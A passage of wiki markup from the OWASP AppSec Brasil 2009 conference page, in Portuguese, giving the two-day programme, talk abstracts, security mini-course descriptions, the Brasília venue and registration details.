			&amp;lt;/center&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:00 - 09:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#eeeeee&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Abertura&amp;lt;/b&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:30 - 10:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#b9c2dc&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Dinis Cruz (OWASP)&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  Apresentação do projeto OWASP&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;10:00 - 12:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#eeeeee&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;[http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)#tab=Keynotes Gary McGraw] (Cigital)&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			The Building Security In Maturity Model (BSIMM)&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;12:00 - 13:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Almoço&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;			&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;13:30 - 14:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Dinis Cruz (OWASP)&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;14:20 - 15:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
		    tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:10 - 15:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Intervalo&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:30 - 16:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;16:20 - 17:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;17:10 - 18:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;tba&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
	      tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &lt;br /&gt;
  &amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;18:00 - 18:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#CCCCCC&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Encerramento do primeiro dia&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
	&amp;lt;/table&amp;gt;					&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Programa da Conferência - Dia 2 - 30 de outubro de 2009'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td width=&amp;quot;14%&amp;quot; class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;08:30 - 09:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#8595C2&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;center&amp;gt;&lt;br /&gt;
			  &amp;lt;strong&amp;gt;			  Recepção			  &amp;lt;/strong&amp;gt;&lt;br /&gt;
			&amp;lt;/center&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:00 - 09:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#eeeeee&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Abertura do segundo dia&amp;lt;/b&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;09:10 - 10:40&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#b9c2dc&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;b&amp;gt;[http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)#tab=Keynotes Jason Li e Jerry Hoff] (Aspect Security)&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			Agile and Secure: Can We Do Both?&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;10:40 - 11:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell&amp;quot; &amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Intervalo&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;11:00 - 12:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;[http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)#tab=Keynotes Kuai Hinojosa] (OWASP)&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
	      Deploying Secure Web Applications with OWASP Resources&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;12:00 - 13:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Almoço&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;			&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;13:30 - 14:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;14:20 - 15:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
		    tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:10 - 15:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#D98B66&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Intervalo&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;	&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;15:30 - 16:20&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;16:20 - 17:10&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; class=&amp;quot;tcell&amp;quot;&amp;gt;&amp;lt;b&amp;gt;tba&amp;lt;/b&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
			  tba&amp;lt;/td&amp;gt;&lt;br /&gt;
                        &lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
		  &amp;lt;td class=&amp;quot;tcell2&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;17:10 - 18:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#B9C2DC&amp;quot; class=&amp;quot;tcell&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;tba&amp;lt;/strong&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
	      tba&amp;lt;/td&amp;gt;&lt;br /&gt;
		  &lt;br /&gt;
  &amp;lt;/tr&amp;gt;		&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;18:00 - 18:30&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt; &lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#CCCCCC&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;strong&amp;gt;Encerramento&amp;lt;/strong&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
	&amp;lt;/table&amp;gt;					&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Resumos das Palestras====&lt;br /&gt;
&lt;br /&gt;
'''The Building Security In Maturity Model (BSIMM)'''&lt;br /&gt;
&lt;br /&gt;
''Gary McGraw'', Cigital&lt;br /&gt;
&lt;br /&gt;
Como uma disciplina, segurança de software tem feito grande progresso na última década. Existem hoje pelo menos 34 grandes iniciativas de segurança de software em empresas, incluindo as empresas de serviços financeiros globais, os fornecedores de software independentes, organizações de defesa, e outros setores. Em 2008, Brian Chess, Sammy Migues e eu entrevistamos os executivos usando nove iniciativas baseadas nas doze práticas do Framework de Segurança de Software como o nosso guia. Essas empresas, entre as nove que gentilmente concordaram em ser identificadas, incluem: Adobe, The Depository Trust and Clearing Corporation (DTCC), EMC, Google, Microsoft, QUALCOMM, e Wells Fargo. Os resultados obtidos, traçados com base em  programas reais em diferentes níveis de maturidade, foram utilizados para para orientar a construção do Construindo Segurança no Modelo de Maturidade (em inglês, Building Security In Maturity Model - BSIMM). Esta palestra irá descrever o modelo de maturidade baseado em observação, aproveitando exemplos reais de muitos programas de segurança de software. Um modelo de maturidade é adequado pois ao melhorar a segurança do software quase sempre significa mudar a forma como uma organização trabalha --- pessoas, processos, automação são todos necessários. Embora nem todas as organizações necessitam alcançar os mesmos objetivos de segurança, todas iniciativas de segurança de software em larga escala compartilham idéias e abordagens comuns. Se você acreditar na Cigital Touchpoints, no SDL da Microsoft, ou OWASP CLASP, há muito a aprender com experiências práticas. Utilize o BSIMM como uma referência para determinar onde você está e que tipo de plano de segurança do software irá funcionar melhor para você.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Agile and Secure: Can We Do Both?'''&lt;br /&gt;
&lt;br /&gt;
''Jason Li and Jerry Hoff'', Aspect Security&lt;br /&gt;
&lt;br /&gt;
O Agile está tornando o mundo do desenvolvimento de software uma tempestade, porém segurança está sendo adaptada vagarosamente. O que nós podemos aprender do movimento do Agile? É possível obter segurança e permanecer no Agile? Jason e Jerry irão compartilhar as experiências de trabalho da Aspect Security com os times Agile para alcançar garantia e economizar dinheiro. Eles irão comparar e contrastar o modelo tradicional de cascata com o processo ágil e mostrar como nós podemos alcançar confiabilidade e segurança enquanto os principios do Agile são mantidos.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Deploying Secure Web Applications with OWASP Resources'''&lt;br /&gt;
&lt;br /&gt;
''Kuai Hinojosa'', OWASP&lt;br /&gt;
&lt;br /&gt;
Universidade são chaves para tornar a segurança de aplicação visível e a necessidade de educar desenvolvedores de software quanto a importância da segurança de aplicações ser um aspecto primordial no desenvolvimento de software nunca foi tão importante.&lt;br /&gt;
Nesta apresentação eu irei mostrar como os recursos da OWASP podem ser utilizados por universidades para desenvolver, testar e implementar aplicações Web seguras. Eu irei discutir desafios que universidades atualmente encontram para integrar as melhores práticas de segurança de aplicações e descrever como as ferramentas e recursos da OWASP são utilizados na Universidade de Nova York para testar as falhas mais comuns em aplicações Web. Eu irei introduzir projetos como a API de Segurança Corporativa da OWASP pode ser utilizado para mitigar as falhas mais comuns em aplicações Web e compartilhar as iniciativas que o Comitê Global de Educação está desenvolvendo.&lt;br /&gt;
Se você estiver interessado em proteger aplicações Web e como apoiar o Comitê Global de Educação da OWASP, você não pode perder esta apresentação!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Mini-Cursos====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:red;font-style:italic;font-weight:bold;font-size: 120%;&amp;quot;&amp;gt;&amp;lt;center&amp;gt;Esta página lista os mini-cursos já aceitos e confirmados. As datas e períodos estão sujeitos a mudanças sem prévio aviso.&amp;lt;/center&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Gestão de Riscos de Segurança Aplicada a Web Services'''&lt;br /&gt;
&lt;br /&gt;
''José Eduardo Malta de Sá Brandão'', IPEA&lt;br /&gt;
&lt;br /&gt;
Data: 27/10&lt;br /&gt;
Período: manhã&lt;br /&gt;
&lt;br /&gt;
O objetivo deste minicurso é apresentar a disciplina de gestão de riscos de segurança associada a web Services. O enfoque do curso visa elucidar aspectos conceituais e sistemáticos nestas metodologias, exemplificado em um estudo de caso que visa reforçar a utilidade e necessidade do uso destas metodologias para o entendimento e o desenvolvimento de web services. O curso deverá fornecer aos alunos base para desenvolverem seus próprios projetos de gestão de riscos. As apresentações deverão discorres sobre conceitos, descrição de modelos e na comparação dos principais padrões relacionados à gestão de riscos na segurança.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Segurança  Web:  Técnicas  para  Programação  Segura  de  Aplicações'''&lt;br /&gt;
&lt;br /&gt;
''André Ricardo Abed Grégio e Vitor Monte Afonso'', CTI/MCT, ''Paulo Licio de Geus'', IC/UNICAMP&lt;br /&gt;
&lt;br /&gt;
Data: 28/10&lt;br /&gt;
Período: tarde&lt;br /&gt;
&lt;br /&gt;
O treinamento visa apresentar os princípios e técnicas de programação segura, principalmente programação de&lt;br /&gt;
aplicações Web, abordando conceitos fundamentais da área, detalhando as vulnerabilidades possíveis de serem&lt;br /&gt;
exploradas e com foco nos métodos de mitigação destas falhas. São abordados exemplos práticos de como corrigir&lt;br /&gt;
vulnerabilidades baseadas no OWASP top 10 em diferentes linguagens de programação, com trechos de código&lt;br /&gt;
vulnerável de aplicações Web retirados de revisões de código realizadas pelos autores. São apresentadas também&lt;br /&gt;
algumas ferramentas para detecção de ataques e testes de vulnerabilidades em aplicações Web.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Segurança Computacional no Desenvolvimento de Web Services'''&lt;br /&gt;
&lt;br /&gt;
''Júlio Cesar Estrella et al'', ICMC/USP&lt;br /&gt;
&lt;br /&gt;
Data: 28/10&lt;br /&gt;
Período: integral (manhã e tarde)&lt;br /&gt;
&lt;br /&gt;
Este minicurso apresenta o desenvolvimento de aplicações distribuídas utilizando o conceito de SOA&lt;br /&gt;
levando em consideração os aspectos de segurança computacional. Para o desenvolvimento das&lt;br /&gt;
aplicações clientes e servidoras serão considerados o uso da engine Apache Axis2. São abordados os&lt;br /&gt;
componentes básicos do Axis2, os tipos e modelos de invocação de Web Services bem como suas&lt;br /&gt;
principais características. Dois padrões de segurança para a construção de Web Services são&lt;br /&gt;
abordadas no contexto da engine Apache Axis2: WS-Security e SAML. A metodologia utilizada para&lt;br /&gt;
este minicurso envolve a utilização de tópicos expositivos e de exercícios práticos, abordando os&lt;br /&gt;
conceitos fundamentais da engine Axis2, e a construção de aplicações reais com foco em segurança.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tecnologias de Segurança em Web Services'''&lt;br /&gt;
&lt;br /&gt;
''Eduardo Takeo Ueda e Wilson Vicente Ruggiero'', Poli/USP&lt;br /&gt;
&lt;br /&gt;
Data: 28/10&lt;br /&gt;
Período: manhã&lt;br /&gt;
&lt;br /&gt;
Devido a sua característica de integração e por fazer uso de padrões abertos, os web services se tornaram uma área de grande interesse para acadêmicos e a indústria nos últimos anos.  Inicialmente, pretendemos introduzir aos participantes os conceitos básicos da arquitetura orientada a serviços, com o intuito do treinamento ser auto-suficiente. Posteriormente serão apresentados os principais padrões e especificações de segurança que estão sendo desenvolvidos e devem ser adotados em web services. Por fim, o treinamento culmina com a exposição e caracterização de desafios atuais em segurança de web services.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Hands on Web Application Testing using the OWASP Testing Guide.'''&lt;br /&gt;
&lt;br /&gt;
''Matt Tesauro'', OWASP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt;Este treinamento será ministrado em inglês sem tradução simultânea&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Data: 27 e 28/10 (2 dias)&lt;br /&gt;
Período: integral (manhã e tarde)&lt;br /&gt;
&lt;br /&gt;
O treinamento irá cobrir as áreas críticas do teste de aplicações Web utilizando o Guia de Testes (Testing Guide) da OWASP v3, como framework de testes de aplicação, e o OWASP Live CD, com as ferramentas para realizar os testes. Uma versão customizada do OWASP Live CD irá ser criada para o treinamento. Ela irá incluir um ambiente controlado de testes oferencendo aplicações vulneráveis de forma que tanto as ferramentas e as aplicações para testar as ferramentas serão incluídas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Local====&lt;br /&gt;
&lt;br /&gt;
'''Local do evento'''&lt;br /&gt;
&lt;br /&gt;
[[Image:CongressoNacional.jpg|The Palácio do Congresso building]]&lt;br /&gt;
&lt;br /&gt;
O evento será na Câmara dos Deputados em Brasília, DF, Brasil no endereço: Auditório Nereu Ramos, Câmara dos Deputados - Anexo II, Praça dos Três Poderes.&lt;br /&gt;
&lt;br /&gt;
Veja a localização no [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=pt-BR&amp;amp;geocode=&amp;amp;q=anexo+II,+camara+dos+deputados,+brasilia&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=43.934478,79.101563&amp;amp;ie=UTF8&amp;amp;t=h&amp;amp;ll=-15.800058,-47.865822&amp;amp;spn=0.01309,0.019312&amp;amp;z=16 Google Maps]&lt;br /&gt;
&lt;br /&gt;
''Como chegar ao local da Conferência''&lt;br /&gt;
&lt;br /&gt;
A definir&lt;br /&gt;
&lt;br /&gt;
====Inscrições====&lt;br /&gt;
&lt;br /&gt;
A Conferência será gratuita, mas será necessário inscrever-se previamente. &lt;br /&gt;
&lt;br /&gt;
A página com o formulário de inscrições está em preparação e será disponibilizada em breve. Quando estiver pronto, o link será publicado neste espaço.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Organização====&lt;br /&gt;
&lt;br /&gt;
